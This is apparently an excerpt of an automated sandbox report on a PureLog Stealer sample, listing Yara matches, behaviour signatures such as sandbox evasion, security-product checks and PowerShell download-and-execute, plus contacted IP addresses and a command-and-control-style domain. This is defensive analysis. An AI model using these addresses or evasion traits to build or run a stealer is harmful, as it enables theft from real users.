Source: Yara match File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4addde8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.6d69838.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4c9de48.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4b1de08.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4abddc8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4e9de68.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.6d69838.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4e9de68.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4c9de48.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7730000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7730000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1818612437.0000000006501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2011791495.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1729748988.0000000004C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4addde8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.6d69838.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4c9de48.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4b1de08.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4abddc8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4e9de68.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.6d69838.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4e9de68.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4c9de48.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7730000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7730000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1818612437.0000000006501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2011791495.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1729748988.0000000004C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1433165 Sample: Gm602axA2d.exe Startdate: 29/04/2024 Architecture: WINDOWS Score: 100 69 Snort IDS alert for network traffic 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 17 other signatures 2->75 8 Gm602axA2d.exe 3 2->8         started        12 Lxfrfbi.exe 2->12         started        14 Lxfrfbi.exe 2->14         started        process3 file4 47 C:\Users\user\AppData\Local\Vulvvmkewji.exe, PE32 8->47 dropped 49 C:\Users\user\...\Office Installer.exe, PE32+ 8->49 dropped 77 Encrypted powershell cmdline option found 8->77 16 Vulvvmkewji.exe 1 2 8->16         started        20 Office Installer.exe 3 8->20         started        22 powershell.exe 23 8->22         started        79 Multi AV Scanner detection for dropped file 12->79 81 Machine Learning detection for dropped file 12->81 24 AppLaunch.exe 12->24         started        83 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->83 26 AppLaunch.exe 14->26         started        signatures5 process6 file7 45 C:\Users\user\AppData\Roaming\Lxfrfbi.exe, PE32 16->45 dropped 57 Multi AV Scanner detection for dropped file 16->57 59 Machine Learning detection for dropped file 16->59 61 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->61 28 AppLaunch.exe 2 16->28         started        63 Suspicious powershell command line found 20->63 65 Tries to download and execute files (via powershell) 20->65 31 powershell.exe 14 16 20->31         started        35 reg.exe 1 1 20->35         started        67 Loading BitLocker PowerShell Module 22->67 37 WmiPrvSE.exe 22->37         started        39 conhost.exe 22->39         started        signatures8 process9 dnsIp10 53 95.211.208.153, 49731, 7707 LEASEWEB-NL-AMS-01NetherlandsNL Netherlands 28->53 51 C:\Users\user\AppData\Local\Temp\...\ver.txt, JSON 31->51 dropped 55 Installs new ROOT certificates 31->55 41 conhost.exe 31->41         started        43 conhost.exe 35->43         started        file11 signatures12 process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
95.211.208.153
 unknown Netherlands
60781 LEASEWEB-NL-AMS-01NetherlandsNL true

Contacted Domains

Name IP Active
windowsupdatebg.s.llnwi.net 208.111.186.128 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
5512.sytes.net true
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown